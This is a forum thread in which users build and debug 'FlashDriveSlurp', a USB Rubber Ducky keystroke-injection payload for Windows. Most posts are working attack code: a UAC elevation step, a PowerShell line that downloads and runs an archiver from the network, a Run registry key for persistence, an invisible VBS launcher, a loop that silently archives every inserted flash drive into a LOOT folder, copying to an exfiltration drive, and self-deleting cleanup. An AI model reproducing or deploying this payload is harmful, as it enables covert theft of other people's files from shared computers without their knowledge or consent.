overwraith Posted November 16, 2013 Share Posted November 16, 2013 (edited) Hi all, been a while since I posted last. Am working on another batch payload that searches for flash drives on a system, and then 7zip's them to a location on the machine. Not sure how I am going to exfiltrate the data, could be a flash drive, or use some other tool that can command line email. The following lines of code can be copied and paisted directly into the command prompt, just watch out for formatting issues, sometimes when copying and pasting the computer adds newlines where there shouldn't be any. REM *** Make the destination we are 7Zipping to. *** set destination=%TEMP%\LOOT\%COMPUTERNAME% mkdir %destination% REM *** Get the attached flash drives letters and drive name's. *** REM *** setlocal EnableDelayedExpansion may need replaced with cmd /V:ON . *** setlocal EnableDelayedExpansion set letters= set drivename= REM *** Check for removable drives, that are healthy, omitting the ducky drive. *** for /f "tokens=3,4 delims= " %A in ('echo list volume ^| diskpart ^| findstr "Volume" ^| findstr "Removable" ^| findstr "Healthy" ^| findstr /V "DUCKY"') do (set letters=!letters! %A & set drivename=!drivename! %B) echo %letters% echo %drivename% REM *** 7zip the found flash drives. *** The biggest problem now will be reading those two lists pairwise, and sending the drive letters and drive names to the 7zip application. I may have to re-work a few things, and use batch "arrays" in the final product instead of using spaces to separate list elements. I plan on sending this all to some sort of batch file, and having it run every minute or so until an exfiltration flash drive is plugged in. Help is always welcome. This may all seem kind of useless, but I have seen plenty of computers which everybody logs into the same account, and you can still dump scripts to them. Edited November 16, 2013 by overwraith Quote Link to comment Share on other sites More sharing options...
overwraith Posted November 19, 2013 Author Share Posted November 19, 2013 (edited) Latest Update, getting closer to an actual payload. Eventually this will be able to either knowingly, or unknowingly 'backup' all your friend's flash drives. REM *** Make the destination we are 7zipping to. *** set destination=%TEMP%\LOOT\%COMPUTERNAME% mkdir %destination% REM *** Get the attached flash drives letters and drive name's. *** REM *** setlocal EnableDelayedExpansion may need replaced with cmd /V:ON . *** setlocal EnableDelayedExpansion set letters= set drivename= REM *** Check for removable drives, that are healthy, omitting the ducky drive. *** for /f "tokens=3,4 delims= " %A in ('echo list volume ^| diskpart ^| findstr "Volume" ^| findstr "Removable" ^| findstr "Healthy" ^| findstr /V "DUCKY"') do (set letters=!letters! %A & set drivename=!drivename! %B) echo %letters% echo %drivename% REM *** 7zip the found flash drives. *** set i=0 for %a in (%letters%) do set /A i+=1 & set letters[!i!]=%a set i=0 for %a in (%drivename%) do set /A i+=1 & set drivename[!i!]=%a REM *** Set number to length of the array. *** set n=%i% REM for /L %i in (1,1,%n%) do echo !letters[%i]! and !drivename[%i]! for /L %i in (1,1,%n%) do 7z a -t7z %destination%\!drivename[%i]!.7z !letters[%i]!:\* Got this to work using someone else's code here: http://stackoverflow.com/questions/8039128/batch-script-in-dos-traverse-multiple-lists-pairwise Again, this is not a batch file yet, just copy and paste into the command prompt. Command prompt can handle multiple lines ok. Also, I believe that 7zip has a command line install option. Takes a pretty long time to zip, may need to use another algorithm, not zip, or zip to another location and have yet another batch process managing the zipping of files from the first C drive location. Edited November 19, 2013 by overwraith Quote Link to comment Share on other sites More sharing options...
th3l0b3 Posted November 19, 2013 Share Posted November 19, 2013 (edited) I was working on this a bit yesterday and this morning. I came up with a way of finding all "removable drives" and collected drive letters. List drives: @ECHO OFF for %%1 in (a b c d e f g h i j k l m n o p q r s t u v w x y z) do ( fsutil fsinfo drivetype %%1: |FIND /V "Directory") I could use Listdrives.bat | Findstr "Removable" > test.txt and it would display the removable drives with an output. Remove the extra information in the txt file with another batch file: @Echo OFF (For /F "Usebackq Tokens=*" %%# in ("test.txt") Do ( Echo "%%#" | FIND /I " - Removable Drive" 1>NUL && ( Set "Line=%%#" Call Set "Line=%%Line:~0,-18%%" Call Echo %%Line%% ) || ( Echo %%# ) ))>"MyNewFile.txt" Pause&Exit From here you can have each drive as its own variable with < MyNewFile.txt ( set /p line1= set /p line2= set /p line3= ) Your way looks much cleaner hahaha. Edited November 19, 2013 by th3l0b3 Quote Link to comment Share on other sites More sharing options...
overwraith Posted November 19, 2013 Author Share Posted November 19, 2013 (edited) I am happy to hear that somebody is interested in this new payload. I will probably base the full payload either on that generic batch payload I wrote, or the duck slurp payload. Stay tuned for more stuff. ... Here is a payload I am troubleshooting. There seems to be an error in the logic, the script appears to stop working if the "DUCKY" drive is not plugged in. When I restart the script after the drive has been plugged in the script will then continue semi-normal execution by zipping drives to the destination, but it does not xcopy the results to the "DUCKY" exfiltration drive. Here is the problem code payload. REM Author: overwraith REM Name: FlashDriveSlurp.txt REM Purpose: Copies flash drives to the hard drive for later exfiltration. REM Encoder V2.4+ REM *** Initial Delay *** DELAY 2000 REM *** Bypass UAC *** REM Using the run command for a broader OS base. GUI r DELAY 250 STRING powershell Start-Process cmd.exe -Verb runAs ENTER DELAY 1500 ALT y DELAY 500 ENTER REM *** Change directories because System32 appears to be protected. *** REM Navigate to %TEMP% location first, as a default directory. STRING CD %TEMP% ENTER REM Ideally we will navigate to this location if it is not locked down. STRING CD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ ENTER REM *** Delete batch file if it already exists. *** STRING erase /Q FlashDriveSlurp.bat ENTER REM *** Make batch file that copies flash drive data. *** STRING copy con FlashDriveSlurp.bat ENTER STRING @ECHO OFF ENTER STRING setlocal EnableDelayedExpansion ENTER REM *** Make the destination we are 7zipping to. *** STRING set destination=%TEMP%\LOOT\%COMPUTERNAME% ENTER STRING mkdir %destination% ENTER STRING :while1 ENTER REM *** Determine if "DUCKY" drive is plugged in, if so exfiltrate the data. *** STRING for /f "tokens=3 delims= " %%A in ('echo list volume ^| diskpart ^| findstr "DUCKY"') do (set DUCKYdrive=%%A:) ENTER STRING if [%DUCKYdrive%] EQU [] ( ENTER STRING goto :break ENTER STRING ) ENTER REM *** Get the attached flash drives letters and drive name's. *** STRING set letters= ENTER STRING set drivename= ENTER STRING for /f "tokens=3,4 delims= " %%A in ('echo list volume ^| diskpart ^| findstr "Volume" ^| findstr "Removable" ^| findstr "Healthy" ^| findstr /V "DUCKY"') do (set letters=!letters! %%A & set drivename=!drivename! %%B) ENTER REM *** 7zip the found flash drives. *** STRING set i=0 ENTER STRING for %%a in (%letters%) do set /A i+=1 & set letters[!i!]=%%a ENTER STRING set i=0 ENTER STRING for %%a in (%drivename%) do set /A i+=1 & set drivename[!i!]=%%a ENTER REM Set number to length of the array. STRING set n=%i% ENTER STRING for /L %%i in (1,1,%n%) do 7z u -t7z %destination%\!drivename[%%i]!.7z !letters[%%i]!:\* ENTER STRING timeout /t 30 ENTER STRING goto :while1 ENTER STRING :break ENTER STRING xcopy %destination% %DUCKYdrive% ENTER REM *** Terminate execution after copying to ducky drive. *** CONTROL z ENTER REM *** Delete Invisible vbs file if already exists. *** STRING erase /Q invis.vbs ENTER REM *** Make VBS file to run invisibly. *** STRING copy con invis.vbs ENTER STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False ENTER CONTROL Z ENTER REM *** Run the batch file invisibly. *** STRING wscript.exe invis.vbs FlashDriveSlurp.bat ENTER REM *** Exit *** STRING EXIT ENTER Here is the resulting batch file: @ECHO OFF setlocal EnableDelayedExpansion set destination=%TEMP%\LOOT\%COMPUTERNAME% mkdir %destination% :while1 for /f "tokens=3 delims= " %%A in ('echo list volume ^| diskpart ^| findstr "DUCKY"') do (set DUCKYdrive=%%A:) if [%DUCKYdrive%] EQU [] ( goto :break ) set letters= set drivename= for /f "tokens=3,4 delims= " %%A in ('echo list volume ^| diskpart ^| findstr "Volume" ^| findstr "Removable" ^| findstr "Healthy" ^| findstr /V "DUCKY"') do (set letters=!letters! %%A & set drivename=!drivename! %%B) set i=0 for %%a in (%letters%) do set /A i+=1 & set letters[!i!]=%%a set i=0 for %%a in (%drivename%) do set /A i+=1 & set drivename[!i!]=%%a set n=%i% for /L %%i in (1,1,%n%) do 7z u -t7z %destination%\!drivename[%%i]!.7z !letters[%%i]!:\* timeout /t 30 goto :while1 :break xcopy %destination% %DUCKYdrive% Similarly to the DuckySlurp payload, this one will work best with a high speed high volume removable drive labeled "DUCKY". For testing purposes however use whatever small flash drive you want. Edited November 19, 2013 by overwraith Quote Link to comment Share on other sites More sharing options...
th3l0b3 Posted November 19, 2013 Share Posted November 19, 2013 i am down, seems like it will be a good thing to have in the utility belt. =] Quote Link to comment Share on other sites More sharing options...
overwraith Posted November 19, 2013 Author Share Posted November 19, 2013 (edited) Fixed some of the bugs. Still need to install 7zip with duckscript. REM Author: overwraith REM Name: FlashDriveSlurp.txt REM Purpose: Copies flash drives to the hard drive for later exfiltration. REM Encoder V2.4+ REM *** Initial Delay *** DELAY 2000 REM *** Bypass UAC *** REM Using the run command for a broader OS base. GUI r DELAY 250 STRING powershell Start-Process cmd.exe -Verb runAs ENTER DELAY 1500 ALT y DELAY 500 ENTER REM *** Change directories because System32 appears to be protected. *** REM Navigate to %TEMP% location first, as a default directory. STRING CD %TEMP% ENTER REM Ideally we will navigate to this location if it is not locked down. STRING CD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ ENTER REM *** Delete batch file if it already exists. *** STRING erase /Q FlashDriveSlurp.bat ENTER REM *** Make batch file that copies flash drive data. *** STRING copy con FlashDriveSlurp.bat ENTER STRING @ECHO OFF ENTER STRING setlocal EnableDelayedExpansion ENTER REM *** Make the destination we are 7zipping to. *** STRING set destination=%TEMP%\LOOT\%COMPUTERNAME% ENTER STRING mkdir %destination% ENTER STRING :while1 ENTER REM *** Determine if "DUCKY" drive is plugged in, if so exfiltrate the data. *** STRING for /f "tokens=3 delims= " %%A in ('echo list volume ^| diskpart ^| findstr "DUCKY"') do (set DUCKYdrive=%%A) ENTER STRING if [%DUCKYdrive%] NEQ [] ( ENTER STRING goto :break ENTER STRING ) ENTER REM *** Get the attached flash drives letters and drive name's. *** STRING set letters= ENTER STRING set drivename= ENTER STRING for /f "tokens=3,4 delims= " %%A in ('echo list volume ^| diskpart ^| findstr "Volume" ^| findstr "Removable" ^| findstr "Healthy" ^| findstr /V "DUCKY"') do (set letters=!letters! %%A & set drivename=!drivename! %%B) ENTER REM *** 7zip the found flash drives. *** STRING set i=0 ENTER STRING for %%a in (%letters%) do set /A i+=1 & set letters[!i!]=%%a ENTER STRING set i=0 ENTER STRING for %%a in (%drivename%) do set /A i+=1 & set drivename[!i!]=%%a ENTER REM Set number to length of the array. STRING set n=%i% ENTER STRING for /L %%i in (1,1,%n%) do 7z u -t7z %destination%\!drivename[%%i]!.7z !letters[%%i]!:\* ENTER STRING timeout /t 30 ENTER STRING goto :while1 ENTER STRING :break ENTER REM *** Copy to the ducky drive. *** STRING xcopy %destination%\* %DUCKYdrive%:\LOOT\%COMPUTERNAME% /I ENTER REM *** Terminate execution, clean up after script. *** STRING erase /Q *.7z ENTER STRING rmdir /S /Q %TEMP%\LOOT ENTER STRING erase invis.vbs ENTER STRING erase /Q %0 ENTER CONTROL z ENTER REM *** Delete Invisible vbs file if already exists. *** STRING erase /Q invis.vbs ENTER REM *** Make VBS file to run invisibly. *** STRING copy con invis.vbs ENTER STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False ENTER CONTROL Z ENTER REM *** Run the batch file invisibly. *** STRING wscript.exe invis.vbs FlashDriveSlurp.bat ENTER REM *** Exit *** STRING EXIT ENTER Edited November 20, 2013 by overwraith Quote Link to comment Share on other sites More sharing options...
overwraith Posted November 20, 2013 Author Share Posted November 20, 2013 I have been trying to get the powershell download and execute script working with this modified silent install procedure. Can anybody see why the powershell window is erroring when this is entered? DELAY 3000 GUI r DELAY 100 STRING powershell (new-object System.Net.WebClient).DownloadFile('http://downloads.sourceforge.net/sevenzip/7z920.exe','%TEMP%\7z920.exe'); DELAY 100 STRING Start-Process "%TEMP%\7z920.exe /S /D=%PROGRAMFILES%\7-Zip\" ENTER The webpage I am getting the 7zip links from is here: http://www.7-zip.org/download.html Quote Link to comment Share on other sites More sharing options...
th3l0b3 Posted November 20, 2013 Share Posted November 20, 2013 Any reason you are downloading the installer rather than using the 7za.exe that is command line driven? I have been using the 7za.exe stand alone for a long time, and it works great. I am just curious. http://t0xicra1n.com/7za.exe Quote Link to comment Share on other sites More sharing options...
overwraith Posted November 20, 2013 Author Share Posted November 20, 2013 (edited) No reason, I guess the command line installer would be better. I will see if that fixes the error. ... It appears that the 7za file on 7zip/sourceforge's site is zipped. This could get messy. I still don't know how we are supposed to send command line arguments to executables in the powershell code, don't know much powershell. Edited November 20, 2013 by overwraith Quote Link to comment Share on other sites More sharing options...
overwraith Posted November 20, 2013 Author Share Posted November 20, 2013 Now have some code for unzipping in powershell: $shell = new-object -com shell.application $zip = $shell.NameSpace(“%temp%\7za920.zip”) foreach($item in $zip.items()) { $shell.Namespace(“%temp%”).copyhere($item) } Must be run through the GUI+R run window, so %TEMP% is replaced with the file path.The following code runs fine, and unzips the zip file. powershell -noexit $shell = new-object -com shell.application; $zip = $shell.NameSpace(“%temp%\7za920.zip”); foreach($item in $zip.items()) { $shell.Namespace(“%temp%”).copyhere($item) } When I glue this command to the end of the powershell download command, bad stuff happens. powershell -noexit (new-object System.Net.WebClient).DownloadFile('http://downloads.sourceforge.net/sevenzip/7za920.zip','%TEMP%\7za920.zip');$shell = new-object -com shell.application; $zip = $shell.NameSpace(“%temp%\7za920.zip”); foreach($item in $zip.items()) { $shell.Namespace(“%temp%”).copyhere($item) } The following is the error that shows up: The string is missing the terminator: ". + CategoryInfo : ParserError: (:) [], ParentContainsErrorRecordEx ception + FullyQualifiedErrorId : TerminatorExpectedAtEndOfString I got this code for unzipping at the following location: http://www.howtogeek.com/tips/how-to-extract-zip-files-using-powershell/ Quote Link to comment Share on other sites More sharing options...
overwraith Posted November 22, 2013 Author Share Posted November 22, 2013 (edited) Not sure why it works, but these powershell commands can be typed into a command window, and they work. Not getting the errors that I was getting in the run box. The run box might have a character limit, or something. I am also going to have to tweak the script to use registry keys instead of using the "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\" folder I was using, because without the registry key it will not start up silently. Edited November 23, 2013 by overwraith Quote Link to comment Share on other sites More sharing options...
overwraith Posted November 23, 2013 Author Share Posted November 23, 2013 (edited) This appears to function correctly, I think this is as good a version as any to call a "release version". REM Author: overwraith REM Name: FlashDriveSlurp.txt REM Purpose: Copies flash drives to the hard drive for later exfiltration. REM Encoder V2.4+ REM *** Initial Delay *** DELAY 2000 REM *** Bypass UAC *** REM Using the run command for a broader OS base. GUI r DELAY 250 STRING powershell Start-Process cmd.exe -Verb runAs ENTER DELAY 1500 ALT y DELAY 500 ENTER REM *** Navigate to %TEMP%. *** STRING cd %TEMP% ENTER REM *** Delete 7zip files if they already exist. *** STRING erase /Q 7za.exe 7z920.zip 7-zip.chm license.txt readme.txt ENTER REM *** Install 7zip. *** STRING powershell (new-object System.Net.WebClient).DownloadFile('http://downloads.sourceforge.net/sevenzip/7za920.zip','%TEMP%\7za920.zip'); $shell = new-object -com shell.application; $zip = $shell.NameSpace('%TEMP%\7za920.zip'); foreach($item in $zip.items()) { $shell.Namespace('%TEMP%').copyhere($item) }Start-Process '%TEMP%\7za.exe' -ArgumentList '/S /D=%PROGRAMFILES%\7-Zip\' ENTER REM *** Delay 7 Seconds. *** DELAY 7000 REM *** Switch from powershell back to command line. *** STRING CMD ENTER REM *** Delete batch file if it already exists. *** STRING erase /Q FlashDriveSlurp.bat ENTER REM *** Make batch file that copies flash drive data. *** STRING copy con FlashDriveSlurp.bat ENTER STRING @ECHO OFF ENTER STRING setlocal EnableDelayedExpansion ENTER REM *** Registry key that restarts script on reboot. *** STRING REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Persistence /t REG_SZ /d "wscript.exe %TEMP%\invis.vbs %TEMP%\FlashDriveSlurp.bat" /f ENTER REM *** Make the destination we are 7zipping to. *** STRING set destination=%TEMP%\LOOT\%COMPUTERNAME% ENTER STRING mkdir %destination% ENTER STRING :while1 ENTER REM *** Determine if "DUCKY" drive is plugged in, if so exfiltrate the data. *** STRING for /f "tokens=3 delims= " %%A in ('echo list volume ^| diskpart ^| findstr "DUCKY"') do (set DUCKYdrive=%%A) ENTER STRING if [%DUCKYdrive%] NEQ [] ( ENTER STRING goto :break ENTER STRING ) ENTER REM *** Get the attached flash drives letters and drive name's. *** STRING set letters= ENTER STRING set drivename= ENTER STRING for /f "tokens=3,4 delims= " %%A in ('echo list volume ^| diskpart ^| findstr "Volume" ^| findstr "Removable" ^| findstr "Healthy" ^| findstr /V "DUCKY"') do (set letters=!letters! %%A & set drivename=!drivename! %%B) ENTER REM *** 7zip the found flash drives. *** STRING set i=0 ENTER STRING for %%a in (%letters%) do set /A i+=1 & set letters[!i!]=%%a ENTER STRING set i=0 ENTER STRING for %%a in (%drivename%) do set /A i+=1 & set drivename[!i!]=%%a ENTER REM Set number to length of the array. STRING set n=%i% ENTER STRING for /L %%i in (1,1,%n%) do 7z u -t7z %destination%\!drivename[%%i]!.7z !letters[%%i]!:\* ENTER STRING timeout /t 30 ENTER STRING goto :while1 ENTER STRING :break ENTER REM *** Copy to the ducky drive. *** STRING xcopy %destination%\* %DUCKYdrive%:\LOOT\%COMPUTERNAME% /I ENTER REM *** Terminate execution, clean up after script. *** STRING erase /Q *.7z ENTER STRING rmdir /S /Q %TEMP%\LOOT ENTER STRING erase invis.vbs ENTER STRING erase /Q %0 ENTER CONTROL z ENTER REM *** Delete Invisible vbs file if already exists. *** STRING erase /Q invis.vbs ENTER REM *** Make VBS file to run invisibly. *** STRING copy con invis.vbs ENTER STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False ENTER CONTROL Z ENTER REM *** Run the batch file invisibly. *** STRING wscript.exe invis.vbs FlashDriveSlurp.bat ENTER REM *** Exit *** STRING EXIT ENTER STRING EXIT ENTER Edited November 23, 2013 by overwraith Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.